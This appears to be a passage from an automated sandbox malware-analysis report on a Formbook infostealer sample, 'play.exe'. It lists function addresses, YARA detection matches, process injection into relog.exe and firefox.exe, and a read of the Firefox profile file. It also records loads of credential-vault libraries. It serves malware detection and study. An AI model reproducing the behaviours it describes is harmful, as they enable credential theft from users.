Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275F0E0	0_2_0275F0E0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027570E9	0_2_027570E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A70C0	0_2_026A70C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274F0CC	0_2_0274F0CC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D516C	0_2_026D516C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268F172	0_2_0268F172
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0276B16B	0_2_0276B16B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AB1B0	0_2_026AB1B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E5630	0_2_026E5630
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027516CC	0_2_027516CC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275F7B0	0_2_0275F7B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02691460	0_2_02691460
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275F43F	0_2_0275F43F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02757571	0_2_02757571
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027695C3	0_2_027695C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273D5B0	0_2_0273D5B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02713A6C	0_2_02713A6C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02757A46	0_2_02757A46
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275FA49	0_2_0275FA49
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274DAC6	0_2_0274DAC6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E5AA0	0_2_026E5AA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02741AA3	0_2_02741AA3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273DAAC	0_2_0273DAAC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275FB76	0_2_0275FB76
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02715BF0	0_2_02715BF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026DDBF9	0_2_026DDBF9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BFB80	0_2_026BFB80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270D800	0_2_0270D800
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A38E0	0_2_026A38E0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A9950	0_2_026A9950
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BB950	0_2_026BB950
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02735910	0_2_02735910
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A9EB0	0_2_026A9EB0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275FF09	0_2_0275FF09
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02663FD5	0_2_02663FD5
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02663FD2	0_2_02663FD2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275FFB1	0_2_0275FFB1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A1F92	0_2_026A1F92
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02719C32	0_2_02719C32
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275FCF2	0_2_0275FCF2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02757D73	0_2_02757D73
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A3D40	0_2_026A3D40
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02751D5A	0_2_02751D5A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BFDC0	0_2_026BFDC0
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_039706E5	4_2_039706E5
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_0399138F	4_2_0399138F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_0397073F	4_2_0397073F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_039726BF	4_2_039726BF
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03978E1F	4_2_03978E1F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03972496	4_2_03972496
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_0397249F	4_2_0397249F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_0397AC3F	4_2_0397AC3F
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330A352	5_2_0330A352
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0325E3F0	5_2_0325E3F0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033103E6	5_2_033103E6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032F0274	5_2_032F0274
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032D02C0	5_2_032D02C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03240100	5_2_03240100
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032EA118	5_2_032EA118
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032D8158	5_2_032D8158
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033041A2	5_2_033041A2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033101AA	5_2_033101AA
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033081CC	5_2_033081CC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032E2000	5_2_032E2000
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03250770	5_2_03250770
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03274750	5_2_03274750
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0324C7C0	5_2_0324C7C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0326C6E0	5_2_0326C6E0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03250535	5_2_03250535
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03310591	5_2_03310591
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032F4420	5_2_032F4420
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03302446	5_2_03302446
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032FE4F6	5_2_032FE4F6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330AB40	5_2_0330AB40
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03306BD7	5_2_03306BD7
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0324EA80	5_2_0324EA80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03266962	5_2_03266962
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032529A0	5_2_032529A0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0331A9A6	5_2_0331A9A6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03252840	5_2_03252840
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0325A840	5_2_0325A840
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032368B8	5_2_032368B8
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0327E8F0	5_2_0327E8F0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03292F28	5_2_03292F28
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03270F30	5_2_03270F30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032F2F30	5_2_032F2F30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032C4F40	5_2_032C4F40
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032CEFA0	5_2_032CEFA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03242FC8	5_2_03242FC8
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330EE26	5_2_0330EE26
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03250E59	5_2_03250E59
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330CE93	5_2_0330CE93
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03262E90	5_2_03262E90
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330EEDB	5_2_0330EEDB
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0325AD00	5_2_0325AD00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032ECD1F	5_2_032ECD1F
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03268DBF	5_2_03268DBF
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0324ADE0	5_2_0324ADE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03250C00	5_2_03250C00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032F0CB5	5_2_032F0CB5
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03240CF2	5_2_03240CF2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330132D	5_2_0330132D
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0323D34C	5_2_0323D34C
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0329739A	5_2_0329739A
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032552A0	5_2_032552A0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032F12ED	5_2_032F12ED
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0326D2F0	5_2_0326D2F0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0326B2C0	5_2_0326B2C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0328516C	5_2_0328516C
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0323F172	5_2_0323F172
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0331B16B	5_2_0331B16B
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0325B1B0	5_2_0325B1B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330F0E0	5_2_0330F0E0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033070E9	5_2_033070E9
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032FF0CC	5_2_032FF0CC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032570C0	5_2_032570C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330F7B0	5_2_0330F7B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03295630	5_2_03295630
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033016CC	5_2_033016CC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03307571	5_2_03307571
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032ED5B0	5_2_032ED5B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033195C3	5_2_033195C3
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330F43F	5_2_0330F43F
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03241460	5_2_03241460
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330FB76	5_2_0330FB76
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0326FB80	5_2_0326FB80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0328DBF9	5_2_0328DBF9
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032C5BF0	5_2_032C5BF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032C3A6C	5_2_032C3A6C
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03307A46	5_2_03307A46
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330FA49	5_2_0330FA49
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032EDAAC	5_2_032EDAAC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03295AA0	5_2_03295AA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032F1AA3	5_2_032F1AA3
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032FDAC6	5_2_032FDAC6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032E5910	5_2_032E5910
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03259950	5_2_03259950
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0326B950	5_2_0326B950
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032BD800	5_2_032BD800
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032538E0	5_2_032538E0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330FF09	5_2_0330FF09
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330FFB1	5_2_0330FFB1
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03251F92	5_2_03251F92
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03213FD2	5_2_03213FD2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03213FD5	5_2_03213FD5
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03259EB0	5_2_03259EB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03307D73	5_2_03307D73
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03253D40	5_2_03253D40
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03301D5A	5_2_03301D5A
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0326FDC0	5_2_0326FDC0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032C9C32	5_2_032C9C32
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330FCF2	5_2_0330FCF2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008C1DB0	5_2_008C1DB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008BCCC7	5_2_008BCCC7
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008BCCD0	5_2_008BCCD0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008BCEF0	5_2_008BCEF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008BAF70	5_2_008BAF70
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008C5470	5_2_008C5470
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008C3650	5_2_008C3650
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008DBBC0	5_2_008DBBC0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310E308	5_2_0310E308
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310E7BC	5_2_0310E7BC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310D7F4	5_2_0310D7F4
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310E423	5_2_0310E423
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310CAAA	5_2_0310CAAA
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310D828	5_2_0310D828
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_0532374F	6_2_0532374F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_0530CFFF	6_2_0530CFFF
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_0530993F	6_2_0530993F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_0530B1DF	6_2_0530B1DF
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_05304856	6_2_05304856
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_0530485F	6_2_0530485F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_05304A7F	6_2_05304A7F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_05302AFF	6_2_05302AFF
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 7_2_000001917364AAAA	7_2_000001917364AAAA
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 7_2_000001917364C308	7_2_000001917364C308
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 7_2_000001917364C7BC	7_2_000001917364C7BC
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 7_2_000001917364B828	7_2_000001917364B828
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 7_2_000001917364C423	7_2_000001917364C423
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 7_2_000001917364B7F4	7_2_000001917364B7F4

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 03297E54 appears 107 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 032CF290 appears 103 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 0323B970 appears 262 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 03285130 appears 58 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 032BEA12 appears 86 times
Source: C:\Users\user\Desktop\play.exe	Code function: String function: 0268B970 appears 262 times
Source: C:\Users\user\Desktop\play.exe	Code function: String function: 0270EA12 appears 86 times
Source: C:\Users\user\Desktop\play.exe	Code function: String function: 026D5130 appears 58 times
Source: C:\Users\user\Desktop\play.exe	Code function: String function: 0271F290 appears 103 times
Source: C:\Users\user\Desktop\play.exe	Code function: String function: 026E7E54 appears 107 times

Sample file is different than original file name gathered from version info

Source: play.exe, 00000000.00000002.2062190338.0000000002931000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs play.exe
Source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \VarFileInfo\TranslationProductVersion\StringFileInfo\%04x%04x\%sOriginalFilename vs play.exe
Source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRelog.exej% vs play.exe
Source: play.exe, 00000000.00000003.1957582944.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs play.exe
Source: play.exe, 00000000.00000003.1959294394.00000000025E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs play.exe

Uses 32bit PE files

Source: play.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: play.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/1@17/14

Source: C:\Windows\SysWOW64\relog.exe

File created: C:\Users\user\AppData\Local\Temp\--x702s3

Jump to behavior

Source: play.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\play.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: play.exe	ReversingLabs: Detection: 55%
Source: play.exe	Virustotal: Detection: 58%

Source: unknown	Process created: C:\Users\user\Desktop\play.exe "C:\Users\user\Desktop\play.exe"
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\play.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: cryptbase.dll	Jump to behavior
